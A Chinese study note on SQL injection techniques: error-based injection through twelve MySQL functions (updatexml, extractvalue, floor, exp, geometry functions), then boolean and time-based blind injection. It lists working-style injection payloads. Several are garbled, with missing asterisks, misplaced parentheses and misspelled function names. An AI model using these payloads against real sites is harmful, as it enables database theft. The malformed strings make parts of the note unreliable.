第十六天(查询方式及报错盲注)
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。
简单来说,就是不返回错误信息的,我们就想办法让他返回错误信息
GET方法中,如果burpsuite在url上加空格,以(+)号代替空格表示
得到的报错信息显示在网页源码上
SQL注入报错盲注(有十二种)
- 报错盲注(报错回显)(优先)
- floor
and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);
-
- updatexml
and 1=(updatexml(1,concat(0x3a,(select user())),1))
-
- extratvalue
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
-
- NAME_CONST
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)
-
- join
select * from(select * from mysql.user ajoin mysql.user b)c;
-
- exp
and exp(~(select * from (select user () ) a) );
-
- GeometryCollection()
and GeometryCollection(()select *from(select user () )a)b );
-
- polygon ()
and polygon (()select * from(select user ())a)b );
-
- multipoint ()
and multipoint (()select * from(select user() )a)b );
-
- multlinestring ()
and multlinestring (()select * from(selectuser () )a)b );
-
- multpolygon ()
and multpolygon (()select * from(selectuser () )a)b );
-
- linestring ()
and linestring (()select * from(select user() )a)b );
- 布尔盲注(逻辑判断)(其次)
- regexp
- like
- ascii
ascii()返回的是一个位号(0-127)可以从32到127
-
- left
left(obj,num)对obj左起至第num的字符串
-
- ord
- mid
- 时间盲注(延时判断)(最后)
- if
写法:select if(Condition,A,B)
Condition为真返回A,否则返回B
-
- sleep
写法:sleep(5)